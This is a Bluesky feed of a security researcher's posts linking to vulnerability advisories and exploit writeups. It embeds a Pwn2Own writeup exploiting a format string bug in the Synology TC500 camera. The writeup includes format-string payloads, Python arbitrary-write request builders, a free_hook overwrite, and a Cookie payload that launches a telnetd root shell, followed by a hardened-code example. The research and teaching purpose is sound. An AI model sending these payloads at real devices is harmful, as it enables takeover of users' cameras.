Marco Ivaldi

@raptor.infosec.exchange.ap.brid.gy

When cryptography is outlawed, bayl bhgynjf jvyy unir cevinpl. [bridged from https://infosec.exchange/@raptor on the fediverse by https://fed.brid.gy/ ]

94 Followers  |  3 Following  |  156 Posts  |  Joined: 16.11.2024  |  2.3812

Latest posts by raptor.infosec.exchange.ap.brid.gy on Bluesky

Funny magic quadrant ;-)

Finally a useful magic quadrant

Thanks to @wendynather for the discovery.

#cybersecurity #vulnerability

11.08.2025 06:20 — 👍 2    🔁 10    💬 0    📌 0
A top-level overview of the presentation presented as a grid of thumbnails, showing 42 slides.

Thank you to everyone who made it out for my DEF CON 33 presentation, "Shaking Out Shells With SSHamble", you can find the materials online at https://hdm.io/decks/MOORE%20-%20Shaking%20Out%20Shells%20With%20SSHamble.pdf

This deck includes some […]

[Original post on infosec.exchange]

10.08.2025 21:14 — 👍 5    🔁 12    💬 0    📌 0
Original post on social.coop

If you want an ebook of some public domain work, either:

1. Check standardebooks.org before Gutenberg. They clean up books from Gutenberg with sane typography and print design.

2. Consider buying a "Dover Thrift Editions" version of the ebook. Many fly-by-night ebook "publishers" are turning a […]

10.08.2025 00:27 — 👍 3    🔁 80    💬 3    📌 0
Full screenshot of https://lumendatabase.org/notices/54378675

#TIL that last month some dimwits at Ventegus Anti-Piracy GmbH (likely on behalf of Hex-Rays?) submitted a #DMCA (Copyright) Complaint to #Google to remove these two pages from search results:

https://0xdeadbeef.info/augur/augur/ […]

[Original post on infosec.exchange]

10.08.2025 15:46 — 👍 0    🔁 0    💬 0    📌 0
oss-security - CVE-2025-48708: ghostscript can embed plaintext password in encrypted PDFs

CVE-2025-48708: #ghostscript can embed plaintext #password in encrypted #PDFs 😶

https://www.openwall.com/lists/oss-security/2025/05/23/2

10.08.2025 13:22 — 👍 0    🔁 0    💬 0    📌 0

Another elegant #vulnerability #advisory by @qualys that was published a few months back

Local information disclosure in #apport and #systemd- #coredump
(CVE-2025-5054 and CVE-2025-4598)

https://www.qualys.com/2025/05/29/apport-coredump/apport-coredump.txt

10.08.2025 07:55 — 👍 0    🔁 0    💬 0    📌 0
FiberGateway GR241AG - Full Exploit Chain During the year of 2023 I’ve identified that it was possible to obtain full control of the FiberGateway GR241AG router (root access), provided by a Portuguese ISP (Meo), via the public wifi network “MEO WiFi”. This wifi network is enabled by default and can only be disabled by contacting the ISP support. More than 1.600.000 households were affected by the identified vulnerabilities.

Another fun #vulnerability writeup with a cool tcpdump GTFOBin trick

#FiberGateway GR241AG - Full #Exploit Chain

https://r0ny.net/FiberGateway-GR241AG-Full-Exploit-Chain/

09.08.2025 20:03 — 👍 1    🔁 1    💬 0    📌 0
CVE 2025 31200 Background On April 16, 2025, Apple released a patch for a bug in CoreAudio which they said was “Actively exploited in the wild.” This flew under the radar a bit. Epsilon’s blog has a great writeup of the other bug that was presumably exploited in this chain: a bug in RPAC. The only thing out there that I am aware of about the CoreAudio side of the bug is a video by Billy Ellis (it’s great.

CVE 2025 31200 #Apple #CoreAudio #vulnerability analysis 🤯

https://blog.noahhw.dev/posts/cve-2025-31200/

09.08.2025 17:42 — 👍 1    🔁 0    💬 0    📌 0
Hypervisors for Memory Introspection and Reverse Engineering Introduction

#Rust #Hypervisors for Memory Introspection and #ReverseEngineering

https://secret.club/2025/06/02/hypervisors-for-memory-introspection-and-reverse-engineering.html

https://github.com/memN0ps/illusion-rs

https://github.com/memN0ps/matrix-rs

09.08.2025 17:03 — 👍 1    🔁 0    💬 0    📌 0
Turin's radio tower with radome and radio bridge. Apparently this is used by the national TV broadcasters as a high capacity link for TV and radio, not as a radar for the Caselle Airport as I initially thought

#torino #turin #italy #moon #astro #radio #tower #radome

09.08.2025 09:38 — 👍 3    🔁 1    💬 0    📌 0
CVE-2024-12718: Path Escape via Python’s tarfile Extraction Filters

@disasmwinnie yeah, see also for additional details https://www.upwind.io/feed/cve-2024-12718-path-escape-via-pythons-tarfile-extraction-filters

09.08.2025 10:54 — 👍 0    🔁 0    💬 0    📌 0
TarFile.extractall(..., filter='tar') arbitrary file chmod · Issue #127987 · python/cpython TarFile.extractall() can be tricked into chmodding arbitrary file (outside of the destination directory) to 0755, despite using filter='tar': $ target=$(mktemp) $ defeatpep706 eggs.tar $target $ ls...

Another fresh #Python #tarfile #vulnerability

Python TarFile.extractall(..., filter='tar') arbitrary file chmod

https://github.com/python/cpython/issues/127987

09.08.2025 07:52 — 👍 0    🔁 0    💬 1    📌 0
Original post on infosec.exchange

A nice series of inspiring logic #bugs! I somewhat pioneered timing leaks and it doesn’t surprise me at all that they are still around and kicking by the way ⏱️

Cracking the Vault: how we found zero-day flaws in authentication, identity, and authorization in #HashiCorp Vault […]

08.08.2025 15:44 — 👍 0    🔁 0    💬 0    📌 0
Exploiting the Synology TC500 at Pwn2Own Ireland 2024

# Introduction

In October 2024, InfoSect participated in Pwn2Own – a bug bounty competition against embedded devices such as cameras, NAS’, and smart speakers. In this blog, I’ll discuss the exploit we developed to get remote code execution on the Synology TC500 smart camera using a format string vulnerability. In the end, we weren’t able to use the exploit, but it was an interesting case study in exploiting format string vulnerabilities.

# Attack Surface

The firmware of the camera is publicly available, and it is possible to run it in an emulated environment using a similar setup to the 6th Real World CTF. From emulation, we enumerated the attack surface of the camera: one interface open to the LAN side is the webd binary, which is used for logging in and managing the camera. The other open port is the RTSP management process, `streamd`.

```
$ netstat -plantu
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address   Foreign Address State   PID/Program name
tcp    0     0     0.0.0.0:443     0.0.0.0:*       LISTEN  770/webd
tcp    0     0     0.0.0.0:554     0.0.0.0:*       LISTEN  847/streamd
tcp    0     0     0.0.0.0:80      0.0.0.0:*       LISTEN  770/webd
tcp    0     0     :::554          :::*            LISTEN  847/streamd
udp    0     0     0.0.0.0:19998   0.0.0.0:*               770/webd
```

The `webd` binary is a variant of the open-source civetweb web server, with minor modifications made for debugging, logging, and to process interactions with the RTSP service. It runs on 32-bit ARM. The service is compiled with the normal set of application security mitigations: PIE, RELRO, ASLR, and stack canaries. It uses glibc v2.30.

# The Vulnerability

While reverse engineering `webd`, we discovered that there are some minor customisations made to `process_new_connection`. This function is called by each worker thread to process an incoming HTTP request. One addition by Synology appears to be a global debug information table, containing information on each worker thread and their most recently processed connections. At the end of `process_new_connection` the information about the request is added to a `thread_name` via `snprintf`.

```c
req_uri = conn->request_info.request_uri;
...
char thread_name[0x80];
mg_snprintf(0, nullptr, thread_name, 0x80, "%s%s", ..., req_uri);
```

This `thread_name` is then appended to the `worker_debug_table` using `set_thread_name`:

```c
if (worker_debug_table != 0)
    set_thread_name(pthread_self(), thread_name);
```

In `set_thread_name`, however, the inputted `thread_name` is used as the sole argument to `mg_snprintf`, meaning there’s a format string vulnerability where the original `request_uri` will be used directly in `snprintf`.

```c
void set_thread_name(pthread_t self, char* thread_name)
{
    ...
    if (worker_debug_table[i]->thread == self)
    {
        mg_snprintf(0, nullptr, worker_debug_table[i]->name, 0x80, thread_name);
        worker_debug_table[i]->name[strlen(thread_name)] = 0;
    }
    ...
}
```

# Exploitation

## Information Leak Primitive

The thread name in the `worker_debug_table` is not returned to the remote user, so we could not directly use a URI like `%p%p%p%p` to fetch pointers from the stack. However, examining the state of the stack at the vulnerable `snprintf` gave insight into a potential information leak.

```
pwndbg> telescope
...
07:001c| 0x7588268c -> 0x75500610 <- 0x312e31 /* '1.1' */
```

The seventh entry in the stack is a pointer to a string containing the HTTP version used in the request. This means that we could use the bug to overwrite the pointer, using a URL which looks like: `%*[some_stack_entry_index]$c%7$n`.

This format string works in two parts:

• `%*[some_stack_entry_index]$c` will take a positional argument, and write that many characters from the stack.
• `%7$n` will count the total bytes written so far in the format string, and write it into the 7th positional argument (which is the 7th stack pointer in our case).

For example, if we had the below C code, 3 bytes would be written, meaning `x` would be updated to 3:

```c
int x;
printf("%*3$c%7$n", "abcdefghijklmn", NULL, 3, NULL, NULL, NULL, &x);
```

Using this format, we can write a pointer over the HTTP version string, which will be returned to us, causing an ASLR bypass. The limitation of this technique is that it isn’t possible to write more than ~0x60000000 bytes on this particular architecture and glibc version. This means that we cannot write a full pointer that isn’t in the executable, which is around the 0x50000000-0x60000000 address range.

## Stack Write Primitive

We can use a similar technique with a custom length string to overwrite any pointer in the stack. The format string must look like `%[some-value]c%[some_stack_index]$n`. We can write either 32, 16, or 8 bits using `%n`, `%hn`, `%hhn` respectively.

## Arbitrary Write Primitive

It is possible to pivot the stack write primitive into arbitrary write by updating a stack pointer to point to itself. At the offset of 3664 on the stack, there is a pointer back to the stack. We shall refer to this pointer as `p1`. `p1` can be made to point to another stack pointer, `p2`, 0x10 bytes further into the stack.

```
pwndbg> tele $sp+3664
00:0000| 0x758834c0 <- 0x758834c0 ## p1
...
04:0010| 0x758834d0 -> 0x75882e68 ## p2 <- 0x5f715ee8
```

After overwriting this offset using `%hhn`, we can change this as below.

```
pwndbg> tele $sp+3664
00:0000| 0x758834c0 -> 0x758834d0 ## p1 -> 0x75882e68 ## p2 <- 0x5f715ee8
04:0010| 0x758834d0 -> 0x75882e68 ## p2 <- 0x5f715ee8
```

These pointers are so deep in the stack of the worker thread that the pointer changes persist across multiple requests.

We are now able to update a stack pointer to an arbitrary address by updating `p2` via `p1`, then write content to that arbitrary address by updating the content of `p2`. Using `p1` it is possible to make `p2` point to the offset 2080 in the stack. This region is effectively unused, allowing changes to that area to persist across requests too. We will refer to a pointer to this area as `p3`. So now we have `p2` pointing to `p3`, and we can incrementally update `p3` by updating the last byte of `p2` before overwriting the content of `p3`. This allows us to create an arbitrary pointer at `p3`. Then we can use the same technique as the stack write using the stack index of `p3`. The code for an 8-bit arbitrary write primitive looks as below:

```python
def stack_write8(offset, value):
    entry = offset // 4
    if len(CLIENT_IP) + 1 > value:
        value += 0x100
    req = b'GET /%' + str(value - len(CLIENT_IP) - 1).encode() + b'c%' + \
          str(entry).encode() + b'$hhn HTTP/1.1\r\n\r\n'
    print(req)
    do_request(req)

def arb_write8(addr, value):
    # Point to offset 2080 by updating p2's last byte to 0x90
    stack_write8(p1, 0x90)
    # Write the last byte of the address to p2 (which is pointing to p3)
    stack_write8(p2, addr & 0xFF)
    # Increment p2 by one byte
    stack_write8(p1, 0x91)
    # Write 2nd byte of address to p2
    stack_write8(p2, (addr >> 8) & 0xFF)
    # repeat until all bytes are written
    stack_write8(p1, 0x92)
    stack_write8(p2, (addr >> 16) & 0xFF)
    stack_write8(p1, 0x93)
    stack_write8(p2, (addr >> 24) & 0xFF)
    if len(CLIENT_IP) + 1 > value:
        value += 0x100
    req = b'/%' + str(value - len(CLIENT_IP) - 1).encode() + b'c%' + \
          str(OFFSET_STACK_DATA // 4).encode() + b'$hhn'
    return do_request(b'GET %s HTTP/1.1\r\n\r\n' % req)
```

## Arbitrary Read Primitive

We can combine the arbitrary write primitive with the information leak primitive to create an arbitrary read. We simply need to update the `http_version` string used in the information leak to an arbitrary address, and make a request. This will return whatever the content of the arbitrary address happens to be.

## Getting a Remote Shell

Gaining a remote shell relies on the fact that glibc 2.30 uses “hooks” for various libc APIs. The broad strategy we used was to overwrite the `__free_hook` with the `system()` hook, and call `free()` with a pointer to a controlled string as the first argument. Firstly, using our information leak, we are able to determine the PIE base, and therefore the address of the `.got`. The `.got` contains the addresses of functions in glibc such as `system`, `malloc`, and `free`. Using the information in the `.got`, it is possible to find the base address of glibc. This gives us the address of the `__free_hook` hook. We can then use the arbitrary write primitive to overwrite the `__free_hook` hook with `system`. Next, it is possible to force webd to call `free` (which is now `system`) on a controlled string with the `Cookie` HTTP header. The function at `0x34a54`, which we have called `GetSessionIdFromCookie`, will create a `std::string` from the cookie value.

```
int32_t* GetSessionIdFromCookie(int32_t* arg1, struct mg_request_info* arg2)
{
    int32_t num_headers = arg2->num_headers
    ...
    if (num_headers <= 0)
        ...
    else
        ...
    while (true)
        if (strcmp(p1: arg2->headers[i_2].name, p2: "Cookie") == 0)
            char* cookie = arg2->headers[i_2].value
            if (cookie != 0)
                ....
                std::string::_M_construct<char const*>(&delim, "; ", &data_afee8[2])
                std::vector<std::string> split_cookie
                SplitStr(ret: &split_cookie, &cookie_1, &delim) // [1]
                ...
                std::vector<std::string> split_cookie_1 = split_cookie
                ...
            else
                while (true)
                    cookie_1 = &var_3c
                    std::string::_M_construct<char const*>(&cookie_1, "=", &data_ab95c[9])
                    SplitStr_2(&var_8c, &split_cookie_1[2], &cookie_1)
                    void* cookie_3 = cookie_1
                    if (cookie_3 != &var_3c) // [2]
                        operator delete(ptr: cookie_3)
}
```

At `[1]`, the function splits the cookie by a semicolon delimiter, storing the vector in `split_cookie`. Then, at `[2]`, the function will delete the cookie up to the semicolon. Therefore, we can send a cookie with the content:

```
Cookie: telnetd -p 1337 -l /bin/sh -F; AAAAAAA
```

After this is split, the telnetd command will be used by `system()` when it is freed.

# Conclusion

This exploit technique worked perfectly against the vulnerable TC500 firmware. However, the night before we flew out to Ireland to submit the exploit, Synology rolled out a firmware update which patched out the format string vulnerability. That’s the Pwn2Own experience for you…. If you want to read about another exploit for this same bug, Baptiste MOINE has a great writeup for Synology

I 💚 format string #bugs! 🐞

Exploiting the #Synology TC500 at #Pwn2Own Ireland 2024 by @infosect

https://blog.infosectcbr.com.au/2025/08/01/exploiting-the-synology-tc500-at-pwn2own-ireland-2024/

08.08.2025 14:58 — 👍 0    🔁 0    💬 0    📌 0
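The root cause in the InfoSect writeup above is a request-derived string passed as the format argument of `snprintf`. As an added example (not InfoSect's, Synology's or civetweb's code), here is the hardened shape of that `set_thread_name` with a constructed worker table; the worker-id integers, `register_worker`, `name_worker_for_request` and `worker_name` are assumed helper names, and `gcc -Werror=format-security` would reject the original non-literal format call at build time.

```c
#include <stdio.h>
#include <string.h>

/* Constructed model of the debug table described in the writeup:
 * one entry per worker thread, each with a 0x80-byte name buffer. */
#define NAME_LEN    0x80
#define MAX_WORKERS 4

struct worker_debug_entry {
    unsigned long thread;   /* assumed worker id; the real code compares pthread_t */
    char name[NAME_LEN];
};

static struct worker_debug_entry worker_debug_table[MAX_WORKERS];

/* Register a (non-zero) worker id in slot i so it can be looked up later. */
void register_worker(int i, unsigned long thread)
{
    if (i >= 0 && i < MAX_WORKERS)
        worker_debug_table[i].thread = thread;
}

/* Hardened form of set_thread_name(). The original used the untrusted
 * thread_name as the format string itself:
 *     mg_snprintf(..., name, 0x80, thread_name);
 * Here it is an argument to the literal "%s" format, so directives such
 * as %7$n arriving in a request URI are stored as text, never interpreted.
 * snprintf NUL-terminates within NAME_LEN, so the original's extra
 * name[strlen(thread_name)] = 0 is dropped; it was only in bounds because
 * thread_name itself was a 0x80-byte buffer.
 * Returns the updated slot, or -1 when the thread has no entry. */
int set_thread_name_safe(unsigned long self, const char *thread_name)
{
    for (int i = 0; i < MAX_WORKERS; i++) {
        if (worker_debug_table[i].thread == self) {
            snprintf(worker_debug_table[i].name, NAME_LEN, "%s", thread_name);
            return i;
        }
    }
    return -1;
}

/* Build the per-request name the way process_new_connection() does
 * ("%s%s" of a prefix and the URI), then store it through the safe path. */
int name_worker_for_request(unsigned long self, const char *prefix,
                            const char *req_uri)
{
    char thread_name[NAME_LEN];
    snprintf(thread_name, sizeof thread_name, "%s%s", prefix, req_uri);
    return set_thread_name_safe(self, thread_name);
}

/* Read back a slot's stored name ("" for an invalid slot). */
const char *worker_name(int i)
{
    return (i >= 0 && i < MAX_WORKERS) ? worker_debug_table[i].name : "";
}

int main(void)
{
    register_worker(0, 770);
    /* Constructed URI shaped like the writeup's leak payload: it is stored
     * verbatim and no %n write ever happens. */
    int slot = name_worker_for_request(770, "worker:", "/%*5$c%7$n");
    printf("slot %d name: %s\n", slot, worker_name(slot));
    return 0;
}
```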

@FritzAdalis ohh happy to see I’m not the only one who read it this way 😅

08.08.2025 13:24 — 👍 0    🔁 0    💬 0    📌 0
Python - Tarfile Realpath Overflow Vulnerability ### Summary Python's `TarFile.extractall()` and `TarFile.extract()` methods support a feature that allows a filter to be set to improve the safety of using these methods. Python's standard library...

A couple other fun bugs 🐛

#Python - #Tarfile Realpath Overflow #Vulnerability
https://github.com/google/security-research/security/advisories/GHSA-hgqp-3mmf-7h8f

#Python #Tar Filter Bypass #Vulnerability
https://github.com/google/security-research/security/advisories/GHSA-7fj8-pjw2-r9vh

08.08.2025 07:42 — 👍 0    🔁 0    💬 0    📌 0
A depiction of the exploit chain

Here’s another fun one by @snyk! I’ve really enjoyed the clever building of the #exploit chain ✊

Abusing #Ubuntu 24.04 features for root privilege escalation

https://labs.snyk.io/resources/abusing-ubuntu-root-privilege-escalation/

08.08.2025 07:21 — 👍 0    🔁 2    💬 1    📌 0
Original post on infosec.exchange

A couple notable related writeups

A great primer on #dbus and #polkit that clearly shows how brittle they are
https://u1f383.github.io/linux/2025/05/25/dbus-and-polkit-introduction.html

An amazing #linux #kernel #vulnerability research and #exploit development writeup […]

07.08.2025 21:14 — 👍 0    🔁 1    💬 0    📌 0

Still catching up with older writeups… Loved this one by @qualys ✊

CVE-2025-6018: #LPE from unprivileged to allow_active in *SUSE 15's #PAM
CVE-2025-6019: #LPE from allow_active to root in #libblockdev via #udisks

https://cdn2.qualys.com/2025/06/17/suse15-pam-udisks-lpe.txt

06.08.2025 20:25 — 👍 0    🔁 0    💬 0    📌 0
GitHub - 0xdea/semgrep-rules: A collection of my Semgrep rules to facilitate vulnerability research. A collection of my Semgrep rules to facilitate vulnerability research. - 0xdea/semgrep-rules

Always happy news to see my work spark new joy. In this case, my @semgrep ruleset at https://github.com/0xdea/semgrep-rules. Congrats to @trailofbits and best wishes for a wonderful career to Will 👍
https://infosec.exchange/@trailofbits/114975919399280105

05.08.2025 13:18 — 👍 2    🔁 0    💬 0    📌 0
CVE-2025-4660: Forescout SecureConnector RCE Learn about the high-risk RCE vulnerability in Forescout SecureConnector allows attackers to turn security agents into C2 channels.

Yet another example of a “security product” causing more harm than good 🤦

CVE-2025-4660: #Forescout SecureConnector #RCE

https://www.netspi.com/blog/technical-blog/red-teaming/cve-2025-4660-forescout-secureconnector-rce/

04.08.2025 20:48 — 👍 0    🔁 0    💬 0    📌 0
Pre-Auth SQL Injection to RCE - Fortinet FortiWeb Fabric Connector (CVE-2025-25257) Welcome back to yet another day in this parallel universe of security. This time, we’re looking at Fortinet’s FortiWeb Fabric Connector. “What is that?” we hear you say. That's a great question; no one knows. For the uninitiated, or unjaded; Fortinet’s FortiWeb Fabric Connector is meant to

Catching up with older writeups, this one stands out for #exploitation

Pre-Auth SQL Injection to RCE - #Fortinet FortiWeb Fabric Connector (CVE-2025-25257)

https://labs.watchtowr.com/pre-auth-sql-injection-to-rce-fortinet-fortiweb-fabric-connector-cve-2025-25257/

04.08.2025 15:30 — 👍 0    🔁 0    💬 0    📌 0
Exploiting zero days in abandoned hardware We successfully exploited two discontinued network devices at DistrictCon’s inaugural Junkyard competition in February, winning runner-up for Most Innovative Exploitation Technique. Our exploit chains demonstrate why end-of-life hardware poses persistent security risks.

Embedded device #hacking 101 💚

#Exploiting #0days in abandoned #hardware by @trailofbits

https://blog.trailofbits.com/2025/07/25/exploiting-zero-days-in-abandoned-hardware/

04.08.2025 10:07 — 👍 0    🔁 0    💬 0    📌 0
Project Zero

I love this kind of #bugs, especially when they are features 🤣

#arm64: Linear mapping is mapped at the same static virtual address

https://project-zero.issues.chromium.org/issues/434208461

04.08.2025 09:22 — 👍 0    🔁 0    💬 0    📌 0
Today, I’m celebrating 1000 days in the #fediverse! Happy to have found such a wonderful home 🥳 :1000:

04.08.2025 02:08 — 👍 0    🔁 0    💬 1    📌 0
My pwn.college hacking activity dashboard showing a 57 day streak

Not long ago I posted about https://pwn.college. I got hooked up with it myself, and I almost got my yellow belt 💛 almost, ‘cause I still have some of the earlier/easier challenges left 😅 I’ll tackle them after the holidays 🏝️ before looking at the more […]

[Original post on infosec.exchange]

02.08.2025 10:19 — 👍 1    🔁 0    💬 0    📌 0
Original post on infosec.exchange

“Beginning today, within one week of reporting a vulnerability to a vendor, we will publicly share that a vulnerability was discovered.

We will share:
The vendor or open-source project that received the report.
The affected product.
The date the report was filed, and when the 90-day disclosure […]

29.07.2025 16:21 — 👍 1    🔁 1    💬 0    📌 0
Original post on infosec.exchange

In our last post, @apps3c shares some #PoCs of #GenAI/ #LLM security issues found in real-world assessments conducted for corporate clients, with a focus on #vulnerabilities that can be exploited to gain unauthorized access to data, resources, and services […]

29.07.2025 12:35 — 👍 0    🔁 2    💬 0    📌 0
Multiple serial offenders. Modems through the ages. A collection...

These are all the modems I've owned, ranging from a 2400 baud Amstrad modem funded by working for and with Acorn, right up to my first DSL modem. Notable is the one in black, also a 2400 […]

[Original post on infosec.exchange]

26.07.2025 14:11 — 👍 0    🔁 1    💬 0    📌 0
Original post on infosec.exchange

“We are now living in a global state that has been structured for the benefit of non-human entities with non-human goals. They have enormous media reach, which they use to distract attention from threats to their own survival. They also have an enormous ability to support litigation against […]

24.07.2025 05:18 — 👍 0    🔁 0    💬 0    📌 0